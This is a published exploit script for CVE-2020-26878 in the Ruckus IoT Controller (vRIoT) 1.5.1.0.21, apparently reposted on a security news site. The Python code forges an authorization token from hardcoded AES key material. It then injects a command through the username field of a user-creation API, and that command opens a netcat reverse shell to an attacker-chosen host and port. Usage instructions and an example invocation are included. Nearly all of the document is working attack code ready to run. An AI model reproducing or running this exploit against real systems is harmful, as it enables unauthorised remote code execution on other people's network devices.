# Product: Ruckus IoT Controller (Ruckus vRIoT)
# Version: <= 1.5.1.0.21
# Vendor: https://support.ruckuswireless.com/
# Vulnerability: Command Injection & Broken Authentication
# References: CVE-2020-26878
# Discovered by: Juan Manuel Fernandez
# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
# Exploit Author: Emre SUREN
# Tested on: Appliance
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests, urllib3, sys
from Crypto.Cipher import AES
from base64 import b64encode, b64decode
from colorama import Fore
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def listen(lhost, lport):
opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
if opt == "y":
return True
else:
return False
def generatePayload(lhost, lport):
payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"
return payload
def generateMagicToken():
enc_dec_method = 'utf-8'
salt = 'nplusServiceAuth'
salt = salt.encode("utf8")
str_key = 'serviceN1authent'
str_to_enc = 'TlBMVVMx'
return encrypt(enc_dec_method, salt, str_key, str_to_enc)
def encrypt(enc_dec_method, salt, str_key, str_to_enc):
aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
mret = b64encode(hx_enc).decode(enc_dec_method)
return mret
def execCmd(rhost, rport, lhost, lport):
payload = generatePayload(lhost, lport)
post_data = {
"username": payload,
"password": "test"
}
print(Fore.BLUE + "[*] Payload\t: " + payload)
token = generateMagicToken()
headers = {
"Authorization": token
}
rpath = "/service/v1/createUser"
uri = 'https://' + rhost + ":" + rport + rpath
r = requests.post(uri, json=post_data, headers=headers, verify=False)
print(Fore.BLUE + "[*] Request sent")
if r.status_code == 200:
print(Fore.GREEN + "[+] Successful. Check for the session...")
else:
print(Fore.RED + "[X] Failed. Check for the response...")
print(Fore.BLUE + "[*] Response\t: " + r.text)
sys.exit()
def main():
if (len(sys.argv) != 5):
print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
print("[*] <RHOST> -> Target IP")
print("[*] <RPORT> -> Target Port")
print("[*] <LHOST> -> Attacker IP")
print("[*] <LPORT> -> Attacker Port")
print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
exit(0)
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
if not listen(lhost, lport):
print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
else:
execCmd(rhost, rport, lhost, lport)
if __name__ == "__main__":
main()This post was last modified on 1 January 2022 7:06 PM
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment